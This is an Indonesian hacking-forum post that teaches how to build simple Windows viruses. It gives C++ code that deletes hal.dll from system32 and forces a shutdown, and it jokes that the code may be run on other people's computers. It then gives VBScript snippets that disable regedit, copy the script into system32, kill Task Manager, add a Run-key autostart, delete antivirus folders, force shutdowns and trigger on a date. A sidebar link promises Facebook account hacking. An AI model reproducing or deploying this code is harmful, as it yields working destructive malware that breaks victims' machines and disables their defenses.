IndeksFAQPendaftaranLoginbtaman bacaanForum TdBlog Semut Nungging

Pengunjung
page counter
Latest topics
» Download software organ tunggal gratis
by Nana80 Wed 29 May 2013, 16:40

» Membuat Background foto sendiri pada Facebook anda
by Tamu Mon 18 Mar 2013, 14:48

» Hosting Download/Upload File mudah, cepat, efisien dan gratis
by Om Jin Sun 17 Mar 2013, 12:57

» Popup Facebook Like Box Dengan Timer CountDown Untuk Blogger
by Om Jin Sat 16 Mar 2013, 17:29

» activator Sim Aquarium 3
by Om Jin Sat 16 Mar 2013, 13:09

» solfware
by sryvika Tue 05 Mar 2013, 08:08

» organ di computer
by nur idris Fri 25 Jan 2013, 17:24

» organ game tunggal
by awex bae Sat 19 Jan 2013, 12:44

Web / Blog Teman
User Yang Sedang Online
Total 1 user online :: 0 Terdaftar, 0 Tersembunyi dan 1 Tamu :: 1 Bot

Tidak ada

User online terbanyak adalah 309 pada Wed 07 Dec 2011, 13:06
Info Forum

Page Ranking Tool





Share | 
 

 Bikin Virus Sederhana Yuk…

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
semut_nunggings@nimbuzz.c
VIP Moderator
VIP Moderator


Jumlah posting : 89
Points : 2921
Join date : 05.10.09
Lokasi : Dikolong langit di atas bumi

PostSubyek: Bikin Virus Sederhana Yuk…   Tue 06 Oct 2009, 17:31




Virus sederhana tapi berbahaya 1.virus ini dibuat pake c++,jadi siapkan tool c++ (ex:dev c portable n sejeniznya) 2.seterusnya copykan script ini Code: #include #include using namespace std; int main(int argc, char *argv[]) { std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME system("shutdown -s -r"); system("PAUSE"); return EXIT_SUCCESS; } 3.program/ato virus ini bakal ngapuz filoe c: jadi jangan di coba di ecsekusi sembarangan 4.Don't try this at your komputer(di komputer orang boleh).hehe 6.teknik yang lebih adavance lagi 7.copy paste lagi script di bawah ne, Code: #include #include using namespace std; int main(int argc, char *argv[]) { std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME system("shutdown -s -r"); system("PAUSE"); return EXIT_SUCCESS; } 8.perbdaan kode yg pertaman ini terlatak pada proses pencarian direktori system secara otomatis(jdi klo yg pertama klo mw ngapus file hal.dll,filenya haruz di c:,klo yg ini otomatis nyari) 9.med coba.. hahaha! sekali dor!! install ulang windows pun jadi. Hahaha

Lanjutan Virus 2
cara mudah bikin virus "versi 2"
Sebelumnya, berikut ini cara-cara paling gampang untuk membuat virus.
semua hal dibawah ini hanya sebagai penambah pengetahuan kita saja
dan tidak boleh disalah gunakan untuk hal-hal yang bersifat merusak.
Dan saya tidak bertanggung jawab jika itu terjadi. Sekarang kita akan
membahas cara gampang membuat virus pake vbs file.

pertama, berikut ini hal-hal yang wajib kita siapin sebelum membuat virus.
# seperangkat komputer berikut monitor,cpu,mouse,kibor, dll (wajib)
# kita harus menyiapkan sebuah file yang ber-ekstensi vbs (*.vbs)
# secangkir teh anget.
# akan lebih afdoL kalo ditemenin lagu2nya rhcp (aku ngefans ma rhcp)

Untuk eksekusi pertama, yang dilakukan virus biasanya mengubah registry.
Sebenarnya udah aku bahas di blogku ini. tapi nggak papa aku ulangin aja.
biar keliatan resmi :-). misalnya:

1. mendisable regedit. Yang kita tulis:
On Error Resume Next(perintah ini digunakan pada file vb
supaya kalo ada yang salah bisa dilanjutin kode selanjutnya)
CreateObject("WScript.Shell").run "cmd.exe /c reg add hkcusoftware\microsoft\windows\currentversion\policies\system /v
disableregistrytools /t reg_dword /d ""1"" /f", vbhide

sebenarnya banyak cara untuk mendisable regedit. misalnya kek gini:
CreateObject("WScript.Shell").regwriteHKEY_CURRENT_USERsoftware\microsoft\windows\currentversion\policies\systemdisableregistrytools", 1, "REG_DWORD"
lalu mengubah registry yang lain. yang nggak aku bahas disini karena
udah pernah aku bahas pada postingan yang lain di blogku ini.
2. mengopikan diri ke direktory lain

CreateObject("Scripting.FileSystemObject").
GetFile(WScript.ScriptFullName).Copy "c:\windows\system32\virus.vbs"
Ada juga cara lain dengan kide seperti ini:
On Error Resume Next
createobject("scripting.filesystemobject").copyfile wscript.scriptfullname,
createobject("scripting.filesystemobject")
.getspecialfolder(1) & "\virus.vbs"
misalnya untuk mengkopikan diri ke direktory C:\WINDOWS\System32
dengan nama virus.vbs
.getspecialfolder(0) digunakan untuk direktory WINDOWS
.getspecialfolder(1) digunakan untuk direktory SYSTEM32 pada windowsXP
.getspecialfolder(2) digunakan untuk direktory Temporary

3.Membunuh proses.
digunakan untuk membunuh proses
(proses adalah program yang sedang berjalan)
misalnya kita akan membunuh proses taskmanager
On Error Resume Next
CreateObject("WScript.Shell")
.run "taskkill /f /im taskmgr.exe", vbhide

4.Menjalankan virus pada saat startup atau saat windows dihidupkan.
menggunakan regedit
On Error Resume Next
CreateObject("WScript.Shell").RegWrite "HKEY_LOCAL_MACHINESoftware\Microsoft\Windows\CurrentVersion\Run\virus"
, "c:\windows\system32\virus.vbs"
(menjalankan virus yang berada di direktory c:\windows\system32
dengan nama virus.vbs)

5.Menghapus File / Folder
agar virus yang kita buat tidak banyak menggunakan script bisa di singkat seperti ini:
On Error Resume Next
set hapus = CreateObject("Scripting.FileSystemObject")
hapus.DeleteFile "C:\xxx.exe" '(menghapus file xxx.exe di direktory C:\)
hapus.DeleteFolder "C:\antivirus" '(menghapus folder antivirus di direktory C:\)
6.Merestart Windows
CreateObject("WScript.Shell").run "shutdown -r -f -t 60", vbhide
merestart windows dalam waktu 60 sekon

7.Meng-ShutDown Windows
CreateObject("WScript.Shell").run "shutdown -s-f -t 60", vbhide
mematikan windows dalam waktu 60 sekon :)yang beda cuman
"shutdown -s-f -t 60"
S = untuk shutdown dan
R = untuk reboot\restart

8. Mengaktifkan Virus Pada Waktu tertentu
If day(now) = 1 and month(now) = 1 and year(now) = 2007 then
'(masukkan kode virus disini)
End if
'misalnya kalo mau mengaktifkan pada tanggal 1, bulan 1
'dan tahun 2007

Ok. Pelajaran bikin virus untuk hari ini saya kira udah cukup.
walaupun udah sering dibahas,, nggak papalah,,,, itung-itung
buat nambahin pengetahuan kita. dan semoga bermanfaat


Baca Juga :
- CARA HACK AKUN FACEBOOK TERUPDATE
- CARA CEPAT DI ADD BANYAK CEWEK FB DALAM WAKTU SINGKAT
- MAU PENGHASILAN 100 RIBU/JAM ?
- DI ADD RIBUAN TEMAN FB DALAM WAKTU SINGKAT


Kembali Ke Atas Go down
http://indochat.ning.com
 

Bikin Virus Sederhana Yuk…

Topik sebelumnya Topik selanjutnya Kembali Ke Atas 

 Similar topics

-
» bikin blog hemat energi!
» Hanya Sebuah Kalimat Sederhana
» [share] Caraku terhindar 100% dari Virus PC & Notebook ( No Deep Freeze )
» tempat bikin stang jepit custom
» Mau bikin rem depan jadi 2 sama velg jadi gede (ASK)
Halaman 1 dari 1

Permissions in this forum:Anda tidak dapat menjawab topik
Forum Berbagi Om Jin :: INTERNET :: HACKING, CRACKING-